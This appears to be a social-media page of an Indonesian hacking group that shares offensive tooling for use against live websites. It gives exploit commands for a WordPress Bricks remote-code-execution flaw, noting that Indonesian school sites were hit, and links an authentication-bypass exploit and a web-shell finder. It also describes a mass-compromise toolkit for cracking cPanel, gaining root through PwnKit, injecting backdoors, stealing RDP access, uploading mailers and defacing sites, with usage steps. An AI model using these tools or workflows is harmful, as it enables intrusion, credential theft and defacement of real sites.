SharkXploit

SharkXploit Let's Play With Xploit

Info yang jual rdp d**g
09/03/2024

Info yang jual rdp d**g

CVE-2024-25600The Bricks theme for WordPress has been identified as vulnerable to a critical security flaw known as CVE-...
09/03/2024

CVE-2024-25600

The Bricks theme for WordPress has been identified as vulnerable to a critical security flaw known as CVE-2024-25600. This vulnerability affects all versions up to, and including, 1.9.6 of the Bricks Builder plugin. It poses a significant risk as it allows unauthenticated attackers to execute arbitrary code remotely on the server hosting the vulnerable WordPress site. CVE-2024-25600 is classified under Remote Code Ex*****on (RCE) vulnerabilities, enabling attackers to manipulate the server into executing malicious code without any authentication. This vulnerability exploits a flaw in the Bricks Builder plugin's handling of user input, allowing attackers to inject and execute PHP code remotely. The exploitation of this vulnerability can lead to full site compromise, data theft, and potential spreading of malware to site visitors.

tools : https://github.com/Chocapikk/CVE-2024-25600

how to use

python3 exploit.py -l urlslist.txt -o vuln.txt ( for search is web vuln or not )

python3 exploit.py -u https://web.com ( for exploit the web)

sorry ya gambarnya gw sensor soalanya web sekolah indo

nt sir
08/03/2024

nt sir

bg udah bg🤕
08/03/2024

bg udah bg🤕

CVE-2023-2437 RxR HaCkErThe UserPro plugin for WordPress is vulnerable to authentication bypass in versions up to, and i...
06/03/2024

CVE-2023-2437 RxR HaCkEr

The UserPro plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 5.1.1. This is due to insufficient verification on the user being supplied during a Facebook login through the plugin. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the email. An attacker can leverage CVE-2023-2448 and CVE-2023-2446 to get the user's email address to successfully exploit this vulnerability.

Download Tools

https://anonymfile.com/VpbWl/aw.rar

How to use

python3 bricks.py urlist.txt

Sorry kemaren salah hehehe

https://github.com/InMyMine7/SHELL-FINDERADVANCE SHELL FINDERAdd dir/shell :- go to folder scan edit shell.txt for add s...
13/02/2024

https://github.com/InMyMine7/SHELL-FINDER

ADVANCE SHELL FINDER

Add dir/shell :
- go to folder scan edit shell.txt for add shell
- go to folder scan edit dir.txt for add dir website

Change Thread :
open finder.py go to mp = Pool(50) change (50) it's up to you how much you want to change

Feature :
- Fast Scanning
- Multithread
- Support http/https
- Safe for use no backdor or etc
- Open Source

Requirement :
- Python 3.11.4
- pip 23.1.2

How To Usage :
python3 finder.py

DISCLAIMER : THIS TOOLS IS FOR EDUCATIONAL PURPOSES ONLY. AND WE DO NOT CONDONE ANY ILLEGAL ACTIVITIES

hellowww miaw :3
02/02/2024

hellowww miaw :3

F-PROAutomatically [clean+update] By Cyzarinesomeone asked me to update the foxv8 code, here it is foxv8+- update[pwnkit...
06/12/2023

F-PROAutomatically [clean+update] By Cyzarine

someone asked me to update the foxv8 code, here it is foxv8+

- update[pwnkit feature] ✅

here is some picture you can see:

https://prnt.sc/UEW7b_suCJLG
https://prnt.sc/FEz87kU81g6G
https://prnt.sc/YutshSB3rvgx

https://prnt.sc/6Qzhzg7Y1gjJ
https://prnt.sc/XpYO7WyxYtUx

we have cleared the logger in FoxAutoV8
-----Schema----------
URL: http://almalinux.co/css/rtl.min.css
URL: http://cloudlinux.biz/css/rtl.min.css
URL: http://api2google.com/apis-explorer

have logger with referer method :
GET /css/rtl.min.css HTTP/1.1
Host: cloudlinux.biz
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Accept: */*
Referer: localhost/urshell.php
-----------------------
we have removed the code on every file that has a logger

https://prnt.sc/6Qzhzg7Y1gjJ
https://prnt.sc/XpYO7WyxYtUx

list of tools used [clean from logger]:

https://pastebin.com/raw/P2f32veP

Link Download Tools : https://pixeldrain.com/u/McrGq9PB

credit Cyzarine Family Team

Kegunaan F-PROAutomatically
If your list is [Shells/UPloaders] choose from 1-22:
[01] Mass Reset Passowrd cPanel
[02] Mass Finder SMTP + Create SMTP
[03] Mass Info OS/Hosting/Conuntry, cPanel/vHosts/Root [PWD|UNAME]
[04] Mass Finder AccessHash Reseller + .my.cnf cPanel
[05] Mass Get Config (cPanel/vHosts) server + Config404 + ConfigCFS
[06] Mass Get Config + Crack cPanel/WHM + WHMCS checker [DEV]
[07] Mass Get Config + Upload Shell on WordPress/Joomla/Opencart
[08] Mass Get Root by ./dirty & PwnKit [PHP/BASH] [NEW]
[09] Mass Get RDP from Windows server
[10] Mass Get Domains-List
[11] Mass Get Emails-List
[12] Mass Get Config + Emails-List
[13] Mass Upload Mailer [Random]
[14] Mass Upload File [Random]
[15] Mass Upload Index + Post in Zone-h
[16] Mass Upload Page/Zip-file + UNZip file
[17] Mass Upload/injection backdoor
[18] Mass Chack if Sending mail is Working or not! [Results delivery]
[19] Mass Reports replacement [Accepted at all Shops]
[20] From any Shell/UPloader, MASS Upload File Shell/Mailer
[21] Reset Passowrd cPanel + Finder/Create SMTP [together]
[22] 01 + 02 + 04 + 06 + 08 [All of them together]

elseif your list is [cPanels] choose from 23-28:
[23] Mass Finder SMTP + Create SMTP
[24] MASS Upload File [Shell/Mailer/Other]
[25] Mass Upload/injection backdoor
[26] Mass Upload Page/Zip-file + UNZip
[27] Mass Chack if Sending mail is Working or not! [Results delivery]
[28] Mass Reports replacement [Accepted at all Shops]

elseif your list is [Wordpress/Joomla/Opencart/Drupal] panels choose 29/30:
[29] Mass login Wordpress/Joomla/Opencart/Drupal panel + UPload Shell
[30] Mass login WordPress and UPload Shell by Selenium [Chrome Driver] [NEW]

cara pakai
list 1-22 If your list is [Shells/UPloaders] choose from 1-22:

jadi jika list kalian adalah shell/uploader kalian pilih nomor 1-29, contoh kalian sudah menanam backdor di web a nah kalian ingin symlink tapi kalian males bgt nih symlink manual jadi kalian bisa pake tools ini, atau kalian ingin Crack cPanel/WHM kalian bisa pake tools ini, jika kalian ingin reset pass cpanel, cari/buat smtp, cari AccessHash Reseller + .my.cnf cPanel, Mass Get Config + Crack cPanel/WHM + WHMCS checker [DEV], Mass Get Root by ./dirty & PwnKit [PHP/BASH] [NEW] secara bersamaaan kalian bisa pilih nomor 22

caranya web a yang sudah kalian tanam backdor tadi kalian masukan kedalaam file .txt yang satu folder dengan tools ini, misal sx.txt nah di dalam sx.txt ini kalian isi dengan web yang sudah di tanam backdor www.domain.com/a.php

untuk list 23-29
kalian baca sendiri aja dah
cara pakenya sama tapi isi listnya bukan backdor kalian tapi u/p cpanel contoh : cp.txt, https://domain.com:2083|username|password

untuk list 29-30
kalian abis ngebf ni, tapi kalian maleeess bgt mau upload shell, nah tools ini fungsinya buat upload shell di web yang sudah kalian brute force, list nya kalian isi dengan u/p contoh : ok.txt, www.domain.com/wp-login.php

Address

Bandar
13535

Telephone

+62895378276565

Website

Alerts

Be the first to know and let us send you an email when SharkXploit posts news and promotions. Your email address will not be used for any other purpose, and you can unsubscribe at any time.

Contact The Organization

Send a message to SharkXploit:

Shortcuts

Share

Category